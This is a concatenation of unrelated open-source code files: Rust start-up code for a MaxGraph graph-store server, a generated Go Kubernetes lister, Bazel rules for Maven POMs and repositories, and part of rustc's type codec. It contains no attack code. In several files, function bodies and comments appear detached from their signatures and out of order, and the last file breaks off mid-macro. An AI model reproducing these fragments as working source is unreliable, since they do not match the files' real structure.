pegasus_runtime.clone()); async_maxgraph_service = PegasusAsyncService::new_service(store_config.clone(), pegasus_runtime.clone(), query_manager.clone(), remote_store_service_manager, lambda_service_client, signal, vineyard_graph.clone(), partition_manager.clone(), task_partition_manager); maxgraph_service = PegasusService::new_service(store_config.clone(), query_manager.clone()); server_manager = Box::new(pegasus_server_manager); let ctrl_and_async_server = start_ctrl_and_async_service(0, ctrl_service, async_maxgraph_service).expect("Start ctrl and async service error."); info!("async maxgraph service and control service bind to: {:?}", ctrl_and_async_server.bind_addrs()); let ctrl_and_async_service_port = ctrl_and_async_server.bind_addrs()[0].1; let store_context = StoreContext::new(vineyard_graph, partition_manager); start_rpc_service(runtime_info_clone, store_config.clone(), maxgraph_service, ctrl_and_async_service_port, hb_resp_sender, store_context); let _manager_guards = ServerManager::start_server(server_manager, store_config, Box::new(recover_prepare)).unwrap(); thread::sleep(Duration::from_secs(u64::max_value())); ::std::mem::drop(ctrl_and_async_server) } fn recover_prepare(prepared: &[u8]) -> Result<Vec<u8>, String>
fn start_rpc_service<VV, VVI, EE, EEI>(runtime_info: Arc<Mutex<RuntimeInfo>>, store_config: Arc<StoreConfig>, maxgraph_service: grpcio::Service, ctrl_and_async_service_port: u16, hb_resp_sender: Sender<Arc<ServerHBResp>>, store_context: StoreContext<VV, VVI, EE, EEI>) where VV: 'static + Vertex, VVI: 'static + Iterator<Item=VV>, EE: 'static + Edge, EEI: 'static + Iterator<Item=EE> { // build hb information let mut hb_providers = Vec::new(); let mut hb_resp_senders = Vec::new(); let hb_provider = move |ref mut server_hb_req: &mut ServerHBReq| { server_hb_req.set_runtimeReq(build_runtime_req(runtime_info.clone())); server_hb_req.mut_endpoint().set_runtimCtrlAndAsyncPort(ctrl_and_async_service_port as i32); }; hb_providers.push(Box::new(hb_provider)); hb_resp_senders.push(hb_resp_sender); let store_config_clone = store_config.clone(); let rpc_service_generator = move |_store| { let service = maxgraph_service; Some(service) }; maxgraph_server::init_with_rpc_service(store_config_clone, rpc_service_generator, hb_providers, hb_resp_senders, store_context); } fn start_ctrl_and_async_service(port: u16, ctrl_service: grpcio::Service, async_maxgraph_service: grpcio::Service) -> Result<Server, String> { let env = Arc::new(Environment::new(1)); let server_builder = ServerBuilder::new(env.clone()) .channel_args(ChannelBuilder::new(env).reuse_port(false).build_args()) .register_service(async_maxgraph_service) .register_service(ctrl_service) .bind("0.0.0.0", port); let mut server = server_builder.build().map_err(|err| format!("Error when build rpc server: {:?}", err))?; server.start(); Ok(server) } fn build_runtime_req(runtime_info: Arc<Mutex<RuntimeInfo>>) -> RuntimeHBReq { let hb_req = runtime_info.lock().expect("Lock runtime hb req failed"); let mut runtime_req = RuntimeHBReq::new(); runtime_req.set_serverStatus(hb_req.get_server_status()); runtime_req.set_runtimePort(hb_req.get_server_port() as i32); runtime_req.set_worker_num_per_process(hb_req.get_worker_num_per_process()); runtime_req.set_process_partition_list(hb_req.get_process_partition_list().to_vec()); info!("Build runtime request {:?} in heartbeat", &runtime_req); runtime_req } /// return: (aliveId, partiiton assignments) fn get_init_info(config: &StoreConfig) -> (u64, Vec<PartitionId>) { use maxgraph_server::client::ZKClient; use maxgraph_common::proto::data_grpc::*; use maxgraph_common::util::ip; let zk_url = format!("{}/{}", config.zk_url, config.graph_name); let zk = ZKClient::new(&zk_url, config.zk_timeout_ms, config.get_zk_auth()); let addr = zk.get_coordinator_addr(); let channel = ChannelBuilder::new(Arc::new(EnvBuilder::new().build())) .connect(addr.to_string().as_str()); let client = ServerDataApiClient::new(channel); let mut request = GetExecutorAliveIdRequest::new(); request.set_serverId(config.worker_id); request.set_ip(ip::get_local_ip()); let response = client.get_executor_alive_id(&request).unwrap(); let alive_id = response.get_aliveId(); let mut request = GetPartitionAssignmentRequest::new(); request.set_serverId(config.worker_id); let response = client.get_partition_assignment(&request).unwrap(); let partitions = response.get_partitionId().to_vec(); (alive_id, partitions) }
{ ::protobuf::parse_from_bytes::<QueryFlow>(prepared) .map_err(|err| err.to_string()) .and_then(move |desc| { info!("parse {} bytes to {:?} ", prepared.len(), desc); Ok(desc.write_to_bytes().expect("query flow to bytes")) }) }
repositorypermissionspolicy.go
/* Copyright AppsCode Inc. and Contributors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ // Code generated by lister-gen. DO NOT EDIT. package v1alpha1 import ( v1alpha1 "kubeform.dev/provider-aws-api/apis/codeartifact/v1alpha1" "k8s.io/apimachinery/pkg/api/errors" "k8s.io/apimachinery/pkg/labels" "k8s.io/client-go/tools/cache" ) // RepositoryPermissionsPolicyLister helps list RepositoryPermissionsPolicies. // All objects returned here must be treated as read-only. type RepositoryPermissionsPolicyLister interface { // List lists all RepositoryPermissionsPolicies in the indexer. // Objects returned here must be treated as read-only. List(selector labels.Selector) (ret []*v1alpha1.RepositoryPermissionsPolicy, err error) // RepositoryPermissionsPolicies returns an object that can list and get RepositoryPermissionsPolicies. RepositoryPermissionsPolicies(namespace string) RepositoryPermissionsPolicyNamespaceLister RepositoryPermissionsPolicyListerExpansion } // repositoryPermissionsPolicyLister implements the RepositoryPermissionsPolicyLister interface. type repositoryPermissionsPolicyLister struct { indexer cache.Indexer } // NewRepositoryPermissionsPolicyLister returns a new RepositoryPermissionsPolicyLister. func NewRepositoryPermissionsPolicyLister(indexer cache.Indexer) RepositoryPermissionsPolicyLister
// List lists all RepositoryPermissionsPolicies in the indexer. func (s *repositoryPermissionsPolicyLister) List(selector labels.Selector) (ret []*v1alpha1.RepositoryPermissionsPolicy, err error) { err = cache.ListAll(s.indexer, selector, func(m interface{}) { ret = append(ret, m.(*v1alpha1.RepositoryPermissionsPolicy)) }) return ret, err } // RepositoryPermissionsPolicies returns an object that can list and get RepositoryPermissionsPolicies. func (s *repositoryPermissionsPolicyLister) RepositoryPermissionsPolicies(namespace string) RepositoryPermissionsPolicyNamespaceLister { return repositoryPermissionsPolicyNamespaceLister{indexer: s.indexer, namespace: namespace} } // RepositoryPermissionsPolicyNamespaceLister helps list and get RepositoryPermissionsPolicies. // All objects returned here must be treated as read-only. type RepositoryPermissionsPolicyNamespaceLister interface { // List lists all RepositoryPermissionsPolicies in the indexer for a given namespace. // Objects returned here must be treated as read-only. List(selector labels.Selector) (ret []*v1alpha1.RepositoryPermissionsPolicy, err error) // Get retrieves the RepositoryPermissionsPolicy from the indexer for a given namespace and name. // Objects returned here must be treated as read-only. Get(name string) (*v1alpha1.RepositoryPermissionsPolicy, error) RepositoryPermissionsPolicyNamespaceListerExpansion } // repositoryPermissionsPolicyNamespaceLister implements the RepositoryPermissionsPolicyNamespaceLister // interface. type repositoryPermissionsPolicyNamespaceLister struct { indexer cache.Indexer namespace string } // List lists all RepositoryPermissionsPolicies in the indexer for a given namespace. func (s repositoryPermissionsPolicyNamespaceLister) List(selector labels.Selector) (ret []*v1alpha1.RepositoryPermissionsPolicy, err error) { err = cache.ListAllByNamespace(s.indexer, s.namespace, selector, func(m interface{}) { ret = append(ret, m.(*v1alpha1.RepositoryPermissionsPolicy)) }) return ret, err } // Get retrieves the RepositoryPermissionsPolicy from the indexer for a given namespace and name. func (s repositoryPermissionsPolicyNamespaceLister) Get(name string) (*v1alpha1.RepositoryPermissionsPolicy, error) { obj, exists, err := s.indexer.GetByKey(s.namespace + "/" + name) if err != nil { return nil, err } if !exists { return nil, errors.NewNotFound(v1alpha1.Resource("repositorypermissionspolicy"), name) } return obj.(*v1alpha1.RepositoryPermissionsPolicy), nil }
{ return &repositoryPermissionsPolicyLister{indexer: indexer} }
maven.bzl
load(":functions.bzl", "create_option_file", "explicit_target") def _maven_pom_impl(ctx): # Contains both *.jar and *.aar files. jars = depset() # classfied jars. Sources are in clsjars["sources"] clsjars = {} # classifier -> depset(jars) clsjars["sources"] = depset() if ctx.attr.library: if ctx.attr.file or ctx.attr.classified_files: fail("Cannot set both file and library for a maven_pom.") jars = depset([jar.class_jar for jar in ctx.attr.library.java.outputs.jars], transitive = [jars]) clsjars["sources"] = depset(ctx.attr.library.java.source_jars.to_list(), transitive = [clsjars["sources"]]) for classifier, library in zip(ctx.attr.classifiers, ctx.attr.classified_libraries): if classifier not in clsjars: clsjars[classifier] = depset() clsjars[classifier] = depset(direct = [jar.class_jar for jar in library.java.outputs.jars], transitive = [clsjars[classifier]]) if ctx.attr.file: if ctx.attr.library or ctx.attr.classified_libraries: fail("Cannot set both file and library for a maven_pom.") jars = depset(transitive = [ctx.attr.file.files, jars]) if ctx.attr.classified_files: for classifier, file in zip(ctx.attr.classifiers, ctx.attr.classified_files): if classifier not in clsjars: clsjars[classifier] = depset() clsjars[classifier] = depset(transitive = [file.files, clsjars[classifier]]) if ctx.attr.properties and ctx.files.properties_files: fail("Cannot set both properties and properties_files for a maven_pom.") parent_poms = depset([], order = "postorder") parent_jars = {} parent_clsjars = {} # pom -> classifier -> depset(jars) deps_poms = depset([], order = "postorder") deps_jars = {} deps_clsjars = {} # pom -> classifier -> depset(jars) # Transitive deps through the parent attribute if ctx.attr.parent: parent_poms = depset(transitive = [ctx.attr.parent.maven.parent.poms, parent_poms], order = "postorder") parent_poms = depset(transitive = [ctx.attr.parent.maven.deps.poms, parent_poms], order = "postorder") parent_poms = depset(direct = [ctx.file.parent], transitive = [parent_poms], order = "postorder") parent_jars.update(ctx.attr.parent.maven.parent.jars) parent_jars.update(ctx.attr.parent.maven.deps.jars) parent_jars[ctx.file.parent] = ctx.attr.parent.maven.jars parent_clsjars.update(ctx.attr.parent.maven.parent.clsjars) parent_clsjars.update(ctx.attr.parent.maven.deps.clsjars) parent_clsjars[ctx.file.parent] = ctx.attr.parent.maven.clsjars elif hasattr(ctx.attr.source, "maven"): parent_poms = ctx.attr.source.maven.parent.poms parent_jars = ctx.attr.source.maven.parent.jars parent_clsjars = ctx.attr.source.maven.parent.clsjars # Transitive deps through deps if ctx.attr.deps: for label in ctx.attr.deps: deps_poms = depset(transitive = [label.maven.parent.poms, deps_poms], order = "postorder") deps_poms = depset(transitive = [label.maven.deps.poms, deps_poms], order = "postorder") deps_poms = depset(direct = [label.maven.pom], transitive = [deps_poms], order = "postorder") deps_jars.update(label.maven.parent.jars) deps_jars.update(label.maven.deps.jars) deps_jars[label.maven.pom] = label.maven.jars deps_clsjars.update(label.maven.parent.clsjars) deps_clsjars.update(label.maven.deps.clsjars) deps_clsjars[label.maven.pom] = label.maven.clsjars elif hasattr(ctx.attr.source, "maven"): deps_poms = ctx.attr.source.maven.deps.poms deps_jars = ctx.attr.source.maven.deps.jars deps_clsjars = ctx.attr.source.maven.deps.clsjars inputs = [] args = [] # Input file to take as base if ctx.file.source: args += ["-i", ctx.file.source.path] inputs += [ctx.file.source] # Output file args += ["-o", ctx.outputs.pom.path] args += ["-x"] if ctx.attr.export_pom else [] # Overrides if ctx.attr.group: args += ["--group", ctx.attr.group] if ctx.attr.artifact: args += ["--artifact", ctx.attr.artifact] if ctx.attr.version: args += ["--version", ctx.attr.version] if ctx.attr.properties: args += ["--properties", ctx.file.properties.path] inputs += [ctx.file.properties] if ctx.files.properties_files: args += ["--properties", ":".join([file.path for file in ctx.files.properties_files])] inputs += ctx.files.properties_files if ctx.attr.version_property: args += ["--version_property", ctx.attr.version_property] # Exclusions for (dependency, exclusions) in ctx.attr.exclusions.items(): args += ["--exclusion", dependency, ",".join([e for e in exclusions])] args += ["--deps", ":".join([dep.path for dep in ctx.files.deps])] inputs += ctx.files.deps ctx.actions.run( mnemonic = "GenPom", inputs = inputs, outputs = [ctx.outputs.pom], arguments = args, executable = ctx.executable._pom, ) return struct(maven = struct( parent = struct( poms = parent_poms, jars = parent_jars, clsjars = parent_clsjars, ), deps = struct( poms = deps_poms, jars = deps_jars, clsjars = deps_clsjars, ), pom = ctx.outputs.pom, jars = jars, clsjars = clsjars, )) maven_pom = rule( attrs = { "deps": attr.label_list(), "library": attr.label( allow_files = True, ), "export_pom": attr.label(), "classifiers": attr.string_list( default = [], ), "classified_libraries": attr.label_list( allow_files = True, default = [], ), "file": attr.label( allow_files = True, ), "classified_files": attr.label_list( allow_files = True, default = [], ), "group": attr.string(), "version": attr.string(), "artifact": attr.string(), "source": attr.label( allow_single_file = True, ), "properties": attr.label( allow_single_file = True, ), "properties_files": attr.label_list( allow_files = True, default = [], ), "version_property": attr.string(), "parent": attr.label( allow_single_file = True, ), "exclusions": attr.string_list_dict(), "_pom": attr.label( executable = True, cfg = "host", default = Label("//tools/base/bazel:pom_generator"), allow_files = True, ), }, outputs = { "pom": "%{name}.pom", }, implementation = _maven_pom_impl, ) # A java library that can be used in a maven_repo rule. # # Usage: # maven_java_library( # name = "name", # deps = A list of maven_java_library or maven_java_import dependencies # # all java_library attriutes # info = A maven coordinate for this artifact as a string # ) def maven_java_library( name, deps = None, runtime_deps = None, exclusions = None, export_artifact = None, srcs = None, resources = [], exports = None, pom = None, visibility = None, **kwargs): if srcs and export_artifact: fail("Ony one of [srcs, export_artifact] can be used at a time") if export_artifact and pom: fail("If export_artifact is specified, the maven information cannot be changed.") java_exports = exports + [export_artifact] if export_artifact else exports native.java_library( name = name, deps = deps, runtime_deps = runtime_deps, srcs = srcs, resources = native.glob(["NOTICE", "LICENSE"]) + resources, exports = java_exports, visibility = visibility, **kwargs ) # TODO: Properly exclude libraries from the pom instead of using _neverlink hacks. maven_deps = (deps or []) + (exports or []) + (runtime_deps or []) maven_pom( name = name + "_maven", deps = [explicit_target(dep) + "_maven" for dep in maven_deps if not dep.endswith("_neverlink")] if maven_deps else None, exclusions = exclusions, library = export_artifact if export_artifact else name, visibility = visibility, source = explicit_target(export_artifact) + "_maven" if export_artifact else pom, export_pom = explicit_target(export_artifact) + "_maven" if export_artifact else None, ) def _import_with_license_impl(ctx): names = [] for jar in ctx.attr.dep[DefaultInfo].files.to_list(): name = jar.basename if jar.extension: name = jar.basename[:-len(jar.extension) - 1] names.append(name) return struct( providers = [ctx.attr.dep[JavaInfo], ctx.attr.dep[DefaultInfo]], java = ctx.attr.dep.java, notice = struct( file = ctx.attr.notice, name = ",".join(names), ), ) import_with_license = rule( implementation = _import_with_license_impl, attrs = { "dep": attr.label(), "notice": attr.label(allow_files = True), }, ) # A java_import rule extended with pom and parent attributes for maven libraries. def maven_java_import(name, pom, classifiers = [], visibility = None, jars = [], **kwargs): native.java_import( name = name + "_import", jars = jars, **kwargs ) import_with_license( name = name, visibility = visibility, dep = name + "_import", notice = "NOTICE", tags = ["require_license"], ) classified_libraries = [] for classifier in classifiers: native.java_import( name = classifier + "-" + name, visibility = visibility, jars = [jar.replace(".jar", "-" + classifier + ".jar") for jar in jars], **kwargs ) classified_libraries += [classifier + "-" + name] maven_pom( name = name + "_maven", library = name, classifiers = classifiers, classified_libraries = classified_libraries, visibility = visibility, source = pom, ) def maven_aar(name, aar, pom, visibility = None): native.filegroup( name = name, srcs = [aar], visibility = visibility, ) maven_pom( name = name + "_maven", file = aar, visibility = visibility, source = pom, ) def _maven_repo_impl(ctx): include_sources = ctx.attr.include_sources seen = {} inputs = [] args = [] for artifact in ctx.attr.artifacts: if not seen.get(artifact.maven.pom): for pom in artifact.maven.parent.poms.to_list(): jars = artifact.maven.parent.jars[pom] if not seen.get(pom): inputs += [pom] + jars.to_list() args += [pom.path] + [jar.path for jar in jars.to_list()] clsjars = artifact.maven.parent.clsjars[pom] for classifier in clsjars: inputs += clsjars[classifier].to_list() args += [jar.path + ":" + classifier for jar in clsjars[classifier].to_list()] seen[pom] = True inputs += [artifact.maven.pom] + artifact.maven.jars.to_list() args += [artifact.maven.pom.path] + [jar.path for jar in artifact.maven.jars.to_list()] for classifier in artifact.maven.clsjars: inputs += artifact.maven.clsjars[classifier].to_list() args += [jar.path + ":" + classifier for jar in artifact.maven.clsjars[classifier].to_list()] seen[artifact.maven.pom] = True for pom in artifact.maven.deps.poms.to_list(): jars = artifact.maven.deps.jars[pom] if not seen.get(pom): inputs += [pom] + jars.to_list() args += [pom.path] + [jar.path for jar in jars.to_list()] if include_sources: clsjars = artifact.maven.deps.clsjars[pom] inputs += clsjars[classifier].to_list() args += [jar.path + ":" + classifier for jar in clsjars[classifier].to_list()] seen[pom] = True # Execute the command option_file = create_option_file( ctx, ctx.outputs.repo.path + ".lst", "\n".join(args), ) ctx.actions.run( inputs = inputs + [option_file], outputs = [ctx.outputs.repo], mnemonic = "mavenrepo", executable = ctx.executable._repo, arguments = [ctx.outputs.repo.path, "@" + option_file.path], ) _maven_repo = rule( attrs = { "artifacts": attr.label_list(), "include_sources": attr.bool(), "_repo": attr.label( executable = True, cfg = "host", default = Label("//tools/base/bazel:repo_builder"), allow_files = True, ), }, outputs = { "repo": "%{name}.zip", }, implementation = _maven_repo_impl,
# dependencies. # # Usage: # maven_repo( # name = The name of the rule. The output of the rule will be ${name}.zip. # artifacts = A list of all maven_java_libraries to add to the repo. # include_sources = Add source jars to the repo as well (useful for tests). # ) def maven_repo(artifacts = [], include_sources = False, **kwargs): _maven_repo( artifacts = [explicit_target(artifact) + "_maven" for artifact in artifacts], include_sources = include_sources, **kwargs )
) # Creates a maven repo with the given artifacts and all their transitive
codec.rs
// This module contains some shared code for encoding and decoding various // things from the `ty` module, and in particular implements support for // "shorthands" which allow to have pointers back into the already encoded // stream instead of re-encoding the same thing twice. // // The functionality in here is shared between persisting to crate metadata and // persisting to incr. comp. caches. use crate::arena::ArenaAllocatable; use crate::infer::canonical::{CanonicalVarInfo, CanonicalVarInfos};
self, interpret::{AllocId, Allocation}, }; use crate::ty::subst::SubstsRef; use crate::ty::{self, List, Ty, TyCtxt}; use rustc_data_structures::fx::FxHashMap; use rustc_hir::def_id::{CrateNum, DefId}; use rustc_serialize::{Decodable, Decoder, Encodable, Encoder}; use rustc_span::Span; use std::hash::Hash; use std::intrinsics; use std::marker::DiscriminantKind; /// The shorthand encoding uses an enum's variant index `usize` /// and is offset by this value so it never matches a real variant. /// This offset is also chosen so that the first byte is never < 0x80. pub const SHORTHAND_OFFSET: usize = 0x80; pub trait EncodableWithShorthand<'tcx, E: TyEncoder<'tcx>>: Copy + Eq + Hash { type Variant: Encodable<E>; fn variant(&self) -> &Self::Variant; } #[allow(rustc::usage_of_ty_tykind)] impl<'tcx, E: TyEncoder<'tcx>> EncodableWithShorthand<'tcx, E> for Ty<'tcx> { type Variant = ty::TyKind<'tcx>; #[inline] fn variant(&self) -> &Self::Variant { self.kind() } } impl<'tcx, E: TyEncoder<'tcx>> EncodableWithShorthand<'tcx, E> for ty::PredicateKind<'tcx> { type Variant = ty::PredicateKind<'tcx>; #[inline] fn variant(&self) -> &Self::Variant { self } } pub trait TyEncoder<'tcx>: Encoder { const CLEAR_CROSS_CRATE: bool; fn position(&self) -> usize; fn type_shorthands(&mut self) -> &mut FxHashMap<Ty<'tcx>, usize>; fn predicate_shorthands(&mut self) -> &mut FxHashMap<ty::PredicateKind<'tcx>, usize>; fn encode_alloc_id(&mut self, alloc_id: &AllocId) -> Result<(), Self::Error>; } /// Trait for decoding to a reference. /// /// This is a separate trait from `Decodable` so that we can implement it for /// upstream types, such as `FxHashSet`. /// /// The `TyDecodable` derive macro will use this trait for fields that are /// references (and don't use a type alias to hide that). /// /// `Decodable` can still be implemented in cases where `Decodable` is required /// by a trait bound. pub trait RefDecodable<'tcx, D: TyDecoder<'tcx>> { fn decode(d: &mut D) -> Result<&'tcx Self, D::Error>; } /// Encode the given value or a previously cached shorthand. pub fn encode_with_shorthand<E, T, M>(encoder: &mut E, value: &T, cache: M) -> Result<(), E::Error> where E: TyEncoder<'tcx>, M: for<'b> Fn(&'b mut E) -> &'b mut FxHashMap<T, usize>, T: EncodableWithShorthand<'tcx, E>, // The discriminant and shorthand must have the same size. T::Variant: DiscriminantKind<Discriminant = isize>, { let existing_shorthand = cache(encoder).get(value).copied(); if let Some(shorthand) = existing_shorthand { return encoder.emit_usize(shorthand); } let variant = value.variant(); let start = encoder.position(); variant.encode(encoder)?; let len = encoder.position() - start; // The shorthand encoding uses the same usize as the // discriminant, with an offset so they can't conflict. let discriminant = intrinsics::discriminant_value(variant); assert!(SHORTHAND_OFFSET > discriminant as usize); let shorthand = start + SHORTHAND_OFFSET; // Get the number of bits that leb128 could fit // in the same space as the fully encoded type. let leb128_bits = len * 7; // Check that the shorthand is a not longer than the // full encoding itself, i.e., it's an obvious win. if leb128_bits >= 64 || (shorthand as u64) < (1 << leb128_bits) { cache(encoder).insert(*value, shorthand); } Ok(()) } impl<'tcx, E: TyEncoder<'tcx>> Encodable<E> for Ty<'tcx> { fn encode(&self, e: &mut E) -> Result<(), E::Error> { encode_with_shorthand(e, self, TyEncoder::type_shorthands) } } impl<'tcx, E: TyEncoder<'tcx>> Encodable<E> for ty::Binder<ty::PredicateKind<'tcx>> { fn encode(&self, e: &mut E) -> Result<(), E::Error> { encode_with_shorthand(e, &self.skip_binder(), TyEncoder::predicate_shorthands) } } impl<'tcx, E: TyEncoder<'tcx>> Encodable<E> for ty::Predicate<'tcx> { fn encode(&self, e: &mut E) -> Result<(), E::Error> { self.kind().encode(e) } } impl<'tcx, E: TyEncoder<'tcx>> Encodable<E> for AllocId { fn encode(&self, e: &mut E) -> Result<(), E::Error> { e.encode_alloc_id(self) } } macro_rules! encodable_via_deref { ($($t:ty),+) => { $(impl<'tcx, E: TyEncoder<'tcx>> Encodable<E> for $t { fn encode(&self, e: &mut E) -> Result<(), E::Error> { (**self).encode(e) } })* } } encodable_via_deref! { &'tcx ty::TypeckResults<'tcx>, ty::Region<'tcx>, &'tcx mir::Body<'tcx>, &'tcx mir::UnsafetyCheckResult, &'tcx mir::BorrowCheckResult<'tcx>, &'tcx mir::coverage::CodeRegion } pub trait TyDecoder<'tcx>: Decoder { const CLEAR_CROSS_CRATE: bool; fn tcx(&self) -> TyCtxt<'tcx>; fn peek_byte(&self) -> u8; fn position(&self) -> usize; fn cached_ty_for_shorthand<F>( &mut self, shorthand: usize, or_insert_with: F, ) -> Result<Ty<'tcx>, Self::Error> where F: FnOnce(&mut Self) -> Result<Ty<'tcx>, Self::Error>; fn with_position<F, R>(&mut self, pos: usize, f: F) -> R where F: FnOnce(&mut Self) -> R; fn map_encoded_cnum_to_current(&self, cnum: CrateNum) -> CrateNum; fn positioned_at_shorthand(&self) -> bool { (self.peek_byte() & (SHORTHAND_OFFSET as u8)) != 0 } fn decode_alloc_id(&mut self) -> Result<AllocId, Self::Error>; } #[inline] pub fn decode_arena_allocable<'tcx, D, T: ArenaAllocatable<'tcx> + Decodable<D>>( decoder: &mut D, ) -> Result<&'tcx T, D::Error> where D: TyDecoder<'tcx>, { Ok(decoder.tcx().arena.alloc(Decodable::decode(decoder)?)) } #[inline] pub fn decode_arena_allocable_slice<'tcx, D, T: ArenaAllocatable<'tcx> + Decodable<D>>( decoder: &mut D, ) -> Result<&'tcx [T], D::Error> where D: TyDecoder<'tcx>, { Ok(decoder.tcx().arena.alloc_from_iter(<Vec<T> as Decodable<D>>::decode(decoder)?)) } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for Ty<'tcx> { #[allow(rustc::usage_of_ty_tykind)] fn decode(decoder: &mut D) -> Result<Ty<'tcx>, D::Error> { // Handle shorthands first, if we have an usize > 0x80. if decoder.positioned_at_shorthand() { let pos = decoder.read_usize()?; assert!(pos >= SHORTHAND_OFFSET); let shorthand = pos - SHORTHAND_OFFSET; decoder.cached_ty_for_shorthand(shorthand, |decoder| { decoder.with_position(shorthand, Ty::decode) }) } else { let tcx = decoder.tcx(); Ok(tcx.mk_ty(ty::TyKind::decode(decoder)?)) } } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for ty::Binder<ty::PredicateKind<'tcx>> { fn decode(decoder: &mut D) -> Result<ty::Binder<ty::PredicateKind<'tcx>>, D::Error> { // Handle shorthands first, if we have an usize > 0x80. Ok(ty::Binder::bind(if decoder.positioned_at_shorthand() { let pos = decoder.read_usize()?; assert!(pos >= SHORTHAND_OFFSET); let shorthand = pos - SHORTHAND_OFFSET; decoder.with_position(shorthand, ty::PredicateKind::decode)? } else { ty::PredicateKind::decode(decoder)? })) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for ty::Predicate<'tcx> { fn decode(decoder: &mut D) -> Result<ty::Predicate<'tcx>, D::Error> { let predicate_kind = Decodable::decode(decoder)?; let predicate = decoder.tcx().mk_predicate(predicate_kind); Ok(predicate) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for SubstsRef<'tcx> { fn decode(decoder: &mut D) -> Result<Self, D::Error> { let len = decoder.read_usize()?; let tcx = decoder.tcx(); tcx.mk_substs((0..len).map(|_| Decodable::decode(decoder))) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for mir::Place<'tcx> { fn decode(decoder: &mut D) -> Result<Self, D::Error> { let local: mir::Local = Decodable::decode(decoder)?; let len = decoder.read_usize()?; let projection: &'tcx List<mir::PlaceElem<'tcx>> = decoder.tcx().mk_place_elems((0..len).map(|_| Decodable::decode(decoder)))?; Ok(mir::Place { local, projection }) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for ty::Region<'tcx> { fn decode(decoder: &mut D) -> Result<Self, D::Error> { Ok(decoder.tcx().mk_region(Decodable::decode(decoder)?)) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for CanonicalVarInfos<'tcx> { fn decode(decoder: &mut D) -> Result<Self, D::Error> { let len = decoder.read_usize()?; let interned: Result<Vec<CanonicalVarInfo<'tcx>>, _> = (0..len).map(|_| Decodable::decode(decoder)).collect(); Ok(decoder.tcx().intern_canonical_var_infos(interned?.as_slice())) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for AllocId { fn decode(decoder: &mut D) -> Result<Self, D::Error> { decoder.decode_alloc_id() } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for ty::SymbolName<'tcx> { fn decode(decoder: &mut D) -> Result<Self, D::Error> { Ok(ty::SymbolName::new(decoder.tcx(), &decoder.read_str()?)) } } macro_rules! impl_decodable_via_ref { ($($t:ty),+) => { $(impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for $t { fn decode(decoder: &mut D) -> Result<Self, D::Error> { RefDecodable::decode(decoder) } })* } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for ty::AdtDef { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { let def_id = <DefId as Decodable<D>>::decode(decoder)?; Ok(decoder.tcx().adt_def(def_id)) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for ty::List<Ty<'tcx>> { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { let len = decoder.read_usize()?; decoder.tcx().mk_type_list((0..len).map(|_| Decodable::decode(decoder))) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for ty::List<ty::Binder<ty::ExistentialPredicate<'tcx>>> { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { let len = decoder.read_usize()?; decoder.tcx().mk_poly_existential_predicates((0..len).map(|_| Decodable::decode(decoder))) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for ty::Const<'tcx> { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { Ok(decoder.tcx().mk_const(Decodable::decode(decoder)?)) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for [ty::ValTree<'tcx>] { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { Ok(decoder.tcx().arena.alloc_from_iter( (0..decoder.read_usize()?) .map(|_| Decodable::decode(decoder)) .collect::<Result<Vec<_>, _>>()?, )) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for Allocation { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { Ok(decoder.tcx().intern_const_alloc(Decodable::decode(decoder)?)) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for [(ty::Predicate<'tcx>, Span)] { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { Ok(decoder.tcx().arena.alloc_from_iter( (0..decoder.read_usize()?) .map(|_| Decodable::decode(decoder)) .collect::<Result<Vec<_>, _>>()?, )) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for [mir::abstract_const::Node<'tcx>] { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { Ok(decoder.tcx().arena.alloc_from_iter( (0..decoder.read_usize()?) .map(|_| Decodable::decode(decoder)) .collect::<Result<Vec<_>, _>>()?, )) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for [mir::abstract_const::NodeId] { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { Ok(decoder.tcx().arena.alloc_from_iter( (0..decoder.read_usize()?) .map(|_| Decodable::decode(decoder)) .collect::<Result<Vec<_>, _>>()?, )) } } impl_decodable_via_ref! { &'tcx ty::TypeckResults<'tcx>, &'tcx ty::List<Ty<'tcx>>, &'tcx ty::List<ty::Binder<ty::ExistentialPredicate<'tcx>>>, &'tcx Allocation, &'tcx mir::Body<'tcx>, &'tcx mir::UnsafetyCheckResult, &'tcx mir::BorrowCheckResult<'tcx>, &'tcx mir::coverage::CodeRegion } #[macro_export] macro_rules! __impl_decoder_methods { ($($name:ident -> $ty:ty;)*) => { $( #[inline] fn $name(&mut self) -> Result<$ty, Self::Error> { self.opaque.$name() } )* } } macro_rules! impl_arena_allocatable_decoder { ([]$args:tt) => {}; ([decode $(, 